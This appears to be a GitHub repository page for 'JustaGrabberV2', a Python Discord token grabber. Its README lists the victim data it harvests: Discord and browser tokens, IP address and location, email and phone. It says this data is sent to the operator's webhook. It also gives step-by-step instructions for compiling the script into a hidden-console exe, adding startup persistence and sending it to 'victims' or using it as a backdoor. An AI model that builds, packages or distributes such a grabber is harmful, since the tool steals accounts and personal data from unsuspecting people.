qylt69 / JustaGrabberV2

A guud discord token grabber written in python 3

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

πŸŽ„ JustaGrabberV2 - A discord token grabber written in python3

πŸŽ‡ Made by kldiscord https://github.com/kldiscord

πŸ˜‹ I upgraded JustaGrabber to JustaGrabber V2!

🌟 Please leave a star if you liked JustaGrabberV2


πŸ’— New Features v.2.0 !!

  • Startup! and new things

🎁 Things will send to you when it grabs someting :

  • Username, Computer name
  • Ip, Country, City, Region, Postal, Location with Google Map
  • Username, UserID, Phone, Email, mfa, nsfw, Language, flags, nitro
  • Tokens (Discord, Other discord clients, Browsers)
  • Will be added soon!

πŸ“· Webhook screenshot

❗ About modules

If requests module is not installed in your victim's computer, JustaGrabberV2 will just exit.

πŸ“γƒ» How to use

  1. Download python 3 at python.org. Must be 3.x.x
  2. Open "JustaGrabberV2.py" with any code editor.
  3. Replace Your settings at line 20-27
  4. Send the code or use as backdoor. Or convert to exe then give to others

βš™γƒ»How to compile .py to .exe

First, install pyinstaller using pip in cmd. ( pip install pyinstaller ) And you must have to check to 'Add python x.x.x to path' when you install Open cmd in the directory that the JustaGrabbeV2r.py is in then type :

pyinstaller --onefile --clean --noconsole JustaGrabberV2.py

replace JustaGrabber.py to your file name. 3 folders and 1 file will be created, delete except for the dist folder. go into the dist folder and there is your exe ready to be sent to victims!

πŸ’Ύγƒ» Settings

If you open JustaGrabberV2.py you will se some settings in line 20-27

JustaGrabber Settings
WEBHOOK_URL in line 20 : Enter your webhook's url
Ping_me in line 21 : If true, will ping you when it grabs
Blacklist in line 22 : list of blacklisted players. You can add,remove. But the name is name of pc
Startup in line 25 : If true, will start when PC starts. See the settings below
FileName in line 26 : Whole file name
extension in line 27 : FIle's extension

About

A guud discord token grabber written in python 3

License:GNU Affero General Public License v3.0


Languages

Language:Python 100.0%